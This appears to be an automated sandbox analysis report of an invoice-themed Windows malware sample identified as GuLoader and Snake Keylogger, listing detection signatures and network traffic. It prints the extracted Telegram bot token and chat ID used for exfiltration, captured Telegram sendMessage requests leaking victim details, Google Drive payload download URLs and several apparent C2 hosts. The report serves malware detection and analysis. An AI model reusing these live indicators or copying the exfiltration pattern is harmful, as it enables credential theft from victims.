Windows Analysis Report
Factura Honorarios 2024-11-17.exe

Overview

General Information

Sample name: Factura Honorarios 2024-11-17.exe
Analysis ID: 1557624
MD5: 2494d7b2fd14dc5604fd6aa412f170fc
SHA1: dc2b1e324c49c9f0fa446211ed24841c48371ef0
SHA256: 0cf14ff76c5d927ad6de94e8d632592a776adb36c733680fcf6385a5d1fed069
Tags: exe, user-TeamDreier

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

{"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000000.00000002.1873262256.0000000006B16000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T13:50:59.975414+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP
2024-11-18T13:51:13.473984+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49729 | 188.114.97.3 | 443 | TCP
2024-11-18T13:50:55.714204+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 193.122.6.168 | 80 | TCP
2024-11-18T13:50:59.229900+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49711 | 193.122.6.168 | 80 | TCP
2024-11-18T13:51:00.870450+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49716 | 193.122.6.168 | 80 | TCP
2024-11-18T13:50:47.489752+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 142.250.185.174 | 443 | TCP

          AV Detection

          Source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7807279596:AAEZM1QwkCh738-y0Qmnc3ubaoLMl6bUCVw", "Chat_id": "7267131103", "Version": "4.4"}
          Source: Factura Honorarios 2024-11-17.exe | ReversingLabs: Detection: 31%
          Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          Source: unknown | DNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 3_2_391787A8 CryptUnprotectData
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 3_2_39178EF1 CryptUnprotectData
          Source: Factura Honorarios 2024-11-17.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0
          Source: unknown | HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
          Source: Factura Honorarios 2024-11-17.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 0_2_004065C7 FindFirstFileW, FindClose
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 0_2_00405996 GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 0_2_00402868 FindFirstFileW
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 3_2_00402868 FindFirstFileW
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 3_2_004065C7 FindFirstFileW, FindClose
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe | Code function: 3_2_00405996 GetTempPathW, DeleteFileW, lstrcatW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW, FindClose

          Networking

          Source: unknown | DNS query: name: api.telegram.org
          Source: global traffic | HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1 | Host: reallyfreegeoip.org
          Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
          Source: Joe Sandbox View | IP Address: 149.154.167.220
          Source: Joe Sandbox View | IP Address: 188.114.97.3
          Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknown | DNS query: name: checkip.dyndns.org
          Source: unknown | DNS query: name: reallyfreegeoip.org
          Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 193.122.6.168:80
          Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 193.122.6.168:80
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 188.114.97.3:443
          Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 188.114.97.3:443
          Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 142.250.185.174:443
          Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
          Source: global traffic | HTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
          Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.0
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 12:51:14 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: Factura Honorarios 2024-11-17.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/4
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/d
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005963000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663661029.00000000073F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2193651298.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=download
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1bbtw8IuHzdajTlKnTAka4q-kS3ZmOLUO&export=downloadD
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.8:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile created: C:\Windows\resources\0809Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ECAE03_2_391ECAE0
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EAE1F3_2_391EAE1F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E521C3_2_391E521C
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E29183_2_391E2918
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EC6183_2_391EC618
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E83193_2_391E8319
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E17103_2_391E1710
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E9B103_2_391E9B10
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EF1113_2_391EF111
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E290A3_2_391E290A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E49083_2_391E4908
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E70083_2_391E7008
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EC6083_2_391EC608
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E00063_2_391E0006
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EDE003_2_391EDE00
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E32383_2_391E3238
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ED9383_2_391ED938
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E5B393_2_391E5B39
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E96373_2_391E9637
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EAE303_2_391EAE30
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E6B303_2_391E6B30
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E322E3_2_391E322E
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E52283_2_391E5228
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E83283_2_391E8328
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ED9273_2_391ED927
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EF1203_2_391EF120
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E3B583_2_391E3B58
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EEC583_2_391EEC58
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EA9583_2_391EA958
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EC1503_2_391EC150
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E09503_2_391E0950
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E7E503_2_391E7E50
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E3B4A3_2_391E3B4A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EEC4A3_2_391EEC4A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E5B483_2_391E5B48
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E96483_2_391E9648
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EC1423_2_391EC142
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E00403_2_391E0040
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E6B403_2_391E6B40
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EE77F3_2_391EE77F
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E44783_2_391E4478
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E24783_2_391E2478
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EBC783_2_391EBC78
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ED4703_2_391ED470
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E12703_2_391E1270
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E91713_2_391E9171
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391EA9683_2_391EA968
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E44683_2_391E4468
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E65683_2_391E6568
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E09603_2_391E0960
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E7E603_2_391E7E60
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391ED4603_2_391ED460
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E2D9A3_2_391E2D9A
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 3_2_391E4D983_2_391E4D98
